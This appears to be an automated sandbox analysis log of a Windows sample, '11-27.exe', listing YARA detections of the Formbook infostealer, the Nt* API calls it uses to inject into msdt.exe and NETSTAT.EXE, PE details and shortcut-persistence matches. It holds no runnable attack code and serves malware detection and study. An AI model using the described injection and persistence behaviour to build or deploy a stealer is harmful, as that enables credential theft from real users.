Source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049195D0 NtClose,LdrInitializeThunk,	6_2_049195D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919540 NtReadFile,LdrInitializeThunk,	6_2_04919540
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919560 NtWriteFile,LdrInitializeThunk,	6_2_04919560
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049196D0 NtCreateKey,LdrInitializeThunk,	6_2_049196D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049196E0 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_049196E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919610 NtEnumerateValueKey,LdrInitializeThunk,	6_2_04919610
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919650 NtQueryValueKey,LdrInitializeThunk,	6_2_04919650
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919660 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_04919660
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919780 NtMapViewOfSection,LdrInitializeThunk,	6_2_04919780
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919FE0 NtCreateMutant,LdrInitializeThunk,	6_2_04919FE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919710 NtQueryInformationToken,LdrInitializeThunk,	6_2_04919710
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919770 NtSetInformationFile,LdrInitializeThunk,	6_2_04919770
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919840 NtDelayExecution,LdrInitializeThunk,	6_2_04919840
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919860 NtQuerySystemInformation,LdrInitializeThunk,	6_2_04919860
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049199A0 NtCreateSection,LdrInitializeThunk,	6_2_049199A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919910 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_04919910
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919A50 NtCreateFile,LdrInitializeThunk,	6_2_04919A50
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049195F0 NtQueryInformationFile,	6_2_049195F0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0491AD30 NtSetContextThread,	6_2_0491AD30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919520 NtWaitForSingleObject,	6_2_04919520
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919670 NtQueryInformationProcess,	6_2_04919670
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049197A0 NtUnmapViewOfSection,	6_2_049197A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0491A710 NtOpenProcessToken,	6_2_0491A710
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919730 NtQueryVirtualMemory,	6_2_04919730
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0491A770 NtOpenThread,	6_2_0491A770
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919760 NtOpenProcess,	6_2_04919760
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049198A0 NtWriteVirtualMemory,	6_2_049198A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049198F0 NtReadVirtualMemory,	6_2_049198F0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919820 NtEnumerateKey,	6_2_04919820
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0491B040 NtSuspendThread,	6_2_0491B040
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049199D0 NtCreateProcessEx,	6_2_049199D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919950 NtQueueApcThread,	6_2_04919950
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919A80 NtOpenDirectoryObject,	6_2_04919A80
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919A10 NtQuerySection,	6_2_04919A10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919A00 NtProtectVirtualMemory,	6_2_04919A00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919A20 NtResumeThread,	6_2_04919A20
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0491A3B0 NtGetContextThread,	6_2_0491A3B0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04919B00 NtSetValueKey,	6_2_04919B00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AAA060 NtClose,	6_2_02AAA060
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AAA110 NtAllocateVirtualMemory,	6_2_02AAA110
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AA9FE0 NtReadFile,	6_2_02AA9FE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AA9F30 NtCreateFile,	6_2_02AA9F30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AAA10C NtAllocateVirtualMemory,	6_2_02AAA10C
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AA9F82 NtReadFile,	6_2_02AA9F82
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AA9F2A NtCreateFile,	6_2_02AA9F2A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09860 NtQuerySystemInformation,LdrInitializeThunk,	7_2_02D09860
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09910 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_02D09910
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D096E0 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_02D096E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09660 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_02D09660
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09FE0 NtCreateMutant,LdrInitializeThunk,	7_2_02D09FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D095D0 NtClose,LdrInitializeThunk,	7_2_02D095D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09A80 NtOpenDirectoryObject,	7_2_02D09A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09A50 NtCreateFile,	7_2_02D09A50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09A10 NtQuerySection,	7_2_02D09A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09A00 NtProtectVirtualMemory,	7_2_02D09A00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09A20 NtResumeThread,	7_2_02D09A20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D0A3B0 NtGetContextThread,	7_2_02D0A3B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09B00 NtSetValueKey,	7_2_02D09B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D098F0 NtReadVirtualMemory,	7_2_02D098F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D098A0 NtWriteVirtualMemory,	7_2_02D098A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D0B040 NtSuspendThread,	7_2_02D0B040
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09840 NtDelayExecution,	7_2_02D09840
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09820 NtEnumerateKey,	7_2_02D09820
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D099D0 NtCreateProcessEx,	7_2_02D099D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D099A0 NtCreateSection,	7_2_02D099A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09950 NtQueueApcThread,	7_2_02D09950
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D096D0 NtCreateKey,	7_2_02D096D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09650 NtQueryValueKey,	7_2_02D09650
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09670 NtQueryInformationProcess,	7_2_02D09670
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09610 NtEnumerateValueKey,	7_2_02D09610
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09780 NtMapViewOfSection,	7_2_02D09780
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D097A0 NtUnmapViewOfSection,	7_2_02D097A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D0A770 NtOpenThread,	7_2_02D0A770
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09770 NtSetInformationFile,	7_2_02D09770
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09760 NtOpenProcess,	7_2_02D09760
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D0A710 NtOpenProcessToken,	7_2_02D0A710
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09710 NtQueryInformationToken,	7_2_02D09710
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09730 NtQueryVirtualMemory,	7_2_02D09730
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D095F0 NtQueryInformationFile,	7_2_02D095F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09540 NtReadFile,	7_2_02D09540
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09560 NtWriteFile,	7_2_02D09560
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D0AD30 NtSetContextThread,	7_2_02D0AD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D09520 NtWaitForSingleObject,	7_2_02D09520
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0046A060 NtClose,	7_2_0046A060
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0046A110 NtAllocateVirtualMemory,	7_2_0046A110
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00469F30 NtCreateFile,	7_2_00469F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00469FE0 NtReadFile,	7_2_00469FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0046A10C NtAllocateVirtualMemory,	7_2_0046A10C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00469F2A NtCreateFile,	7_2_00469F2A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00469F82 NtReadFile,	7_2_00469F82

Source: C:\Users\user\Desktop\11-27.exe	Code function: 0_3_02B1A4F4	0_3_02B1A4F4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Code function: 5_3_02AEA4F4	5_3_02AEA4F4
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048E841F	6_2_048E841F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499D466	6_2_0499D466
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04902581	6_2_04902581
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A25DD	6_2_049A25DD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048ED5E0	6_2_048ED5E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A2D07	6_2_049A2D07
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048D0D20	6_2_048D0D20
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A1D55	6_2_049A1D55
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A2EF7	6_2_049A2EF7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499D616	6_2_0499D616
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048F6E30	6_2_048F6E30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049ADFCE	6_2_049ADFCE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A1FF1	6_2_049A1FF1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048EB090	6_2_048EB090
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049020A0	6_2_049020A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A20A8	6_2_049A20A8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A28EC	6_2_049A28EC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04991002	6_2_04991002
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049AE824	6_2_049AE824
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048DF900	6_2_048DF900
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_048F4120	6_2_048F4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A22AE	6_2_049A22AE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0490EBB0	6_2_0490EBB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049903DA	6_2_049903DA
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0499DBD2	6_2_0499DBD2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_049A2B28	6_2_049A2B28
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AAEA4D	6_2_02AAEA4D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02A99E3B	6_2_02A99E3B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02A99E40	6_2_02A99E40
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02A92FB0	6_2_02A92FB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02AAE4E0	6_2_02AAE4E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_02A92D90	6_2_02A92D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D8E2C5	7_2_02D8E2C5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84AEF	7_2_02D84AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D932A9	7_2_02D932A9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D922AE	7_2_02D922AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D85A4F	7_2_02D85A4F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEB236	7_2_02CEB236
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D7FA2B	7_2_02D7FA2B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D803DA	7_2_02D803DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D8DBD2	7_2_02D8DBD2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CFABD8	7_2_02CFABD8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D723E3	7_2_02D723E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D18BE8	7_2_02D18BE8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF138B	7_2_02CF138B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEEB9A	7_2_02CEEB9A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D6EB8A	7_2_02D6EB8A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CFEBB0	7_2_02CFEBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEAB40	7_2_02CEAB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D6CB4F	7_2_02D6CB4F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE3360	7_2_02CE3360
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D8231B	7_2_02D8231B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D92B28	7_2_02D92B28
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D860F5	7_2_02D860F5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D928EC	7_2_02D928EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDB090	7_2_02CDB090
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF20A0	7_2_02CF20A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D920A8	7_2_02D920A8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC6800	7_2_02CC6800
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF701D	7_2_02CF701D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D81002	7_2_02D81002
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D9E824	7_2_02D9E824
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA830	7_2_02CEA830
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDC1C0	7_2_02CDC1C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE2990	7_2_02CE2990
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE99BF	7_2_02CE99BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CCF900	7_2_02CCF900
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE4120	7_2_02CE4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D92EF7	7_2_02D92EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D71EB6	7_2_02D71EB6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D4AE60	7_2_02D4AE60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D8D616	7_2_02D8D616
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE5600	7_2_02CE5600
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE6E30	7_2_02CE6E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D9DFCE	7_2_02D9DFCE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D91FF1	7_2_02D91FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D867E2	7_2_02D867E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF4CD4	7_2_02CF4CD4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D84496	7_2_02D84496
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEB477	7_2_02CEB477
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D8D466	7_2_02D8D466
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD841F	7_2_02CD841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE2430	7_2_02CE2430
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D925DD	7_2_02D925DD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CDD5E0	7_2_02CDD5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF2581	7_2_02CF2581
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D82D82	7_2_02D82D82
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF65A0	7_2_02CF65A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D91D55	7_2_02D91D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CE2D50	7_2_02CE2D50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D92D07	7_2_02D92D07
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC0D20	7_2_02CC0D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0046EA4D	7_2_0046EA4D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_0046E4E0	7_2_0046E4E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00452D90	7_2_00452D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00459E40	7_2_00459E40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00459E3B	7_2_00459E3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_00452FB0	7_2_00452FB0

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 02CCB150 appears 159 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 02D1D08C appears 47 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 02D55720 appears 81 times
Source: C:\Windows\SysWOW64\msdt.exe	Code function: String function: 048DB150 appears 45 times

Source: 11-27.exe

Static PE information: invalid certificate

Source: 11-27.exe	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: 11-27.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Hmptdrv.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Hmptdrv.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 11-27.exe, 00000000.00000002.424908083.00000000056DF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 11-27.exe
Source: 11-27.exe, 00000000.00000002.421533120.0000000004B10000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs 11-27.exe
Source: 11-27.exe, 00000000.00000002.421469900.0000000004AF0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs 11-27.exe
Source: 11-27.exe, 00000000.00000002.415590971.0000000002310000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamecomctl32.DLL.MUIj% vs 11-27.exe
Source: 11-27.exe, 00000000.00000002.415732009.0000000002400000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs 11-27.exe
Source: 11-27.exe, 00000000.00000002.420907601.0000000003170000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamenetstat.exej% vs 11-27.exe
Source: 11-27.exe, 00000000.00000002.421499515.0000000004B00000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs 11-27.exe
Source: 11-27.exe, 00000000.00000002.415547343.00000000022F0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs 11-27.exe

Source: 00000005.00000002.430498820.0000000002E67000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000005.00000002.430498820.0000000002E67000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000002.420259807.0000000002E97000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000000.00000002.420259807.0000000002E97000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.416538189.0000000003247000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000002.00000002.416538189.0000000003247000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
